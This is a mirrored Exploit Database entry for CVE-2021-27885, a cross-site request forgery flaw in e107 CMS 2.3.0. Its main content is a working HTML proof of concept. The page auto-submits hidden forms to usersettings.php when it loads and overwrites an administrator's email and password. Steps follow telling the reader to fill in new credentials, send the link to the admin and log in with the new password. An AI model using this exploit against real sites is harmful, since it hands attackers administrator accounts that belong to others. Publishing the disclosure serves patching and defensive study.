e107 CMS 2.3.0 – CSRF

• Exploit Database
• 58 阅读

• 作者： Tadjmen
  日期： 2021-03-04
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/49614/

• # Exploit Title: e107 CMS 2.3.0 - CSRF
  # Date: 04/03/2021
  # Exploit Author: Tadjmen
  # Vendor Homepage: https://e107.org
  # Software Link: https://e107.org/download
  # Version: 2.3.0
  # Tested on: Windows 10
  # CVE : CVE-2021-27885
  
  CSRF vulnerability on e107 CMS
  
  ## Bug Description
  Hi. I found a CSRF on the e107 CMS. Hacker can change password any user click the link.
  
  ## How to Reproduce
  Steps to reproduce the behavior:
  1. Create a CSRF login POC using the following code.
  
  ```
  <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
  
  <html>
  <head>
  <title>Cross Site Request Forgery (Edit Existing Admin details)</title>
  </head>
  
  <body onload="javascript:fireForms()">
  <script language="JavaScript">
  
  function fireForms()
  {
  var count = 2;
  var i=0;
  
  for(i=0; i<count; i++)
  {
  document.forms[i].submit();
  }
  }
  
  </script>
  
  <H2>Cross Site Request Forgery (Edit Existing Admin details)</H2>
  
  <form method="POST" name="form0" action="
  http://localhost/[path-to-e107-cms]/usersettings.php">
  
  <input type="hidden" name="loginname" value="admin"/>
  <input type="hidden" name="email" value="[email]"/>
  <input type="hidden" name="password1" value="[password]"/>
  <input type="hidden" name="password2" value="[password]"/>
  <input type="hidden" name="hideemail" value="1"/>
  <input type="hidden" name="image" value=""/>
  <input type="hidden" name="signature" value=""/>
  <input type="hidden" name="updatesettings" value="Save settings"/>
  <input type="hidden" name="_uid" value="2"/>
  
  
  
  
  </form>
  
  </body>
  </html>
  ```
  
  
  2. Replace the email and password with the valid credentials.
  3. Send the link script to the victim (admin) to make them click.
  4. Login with new admin password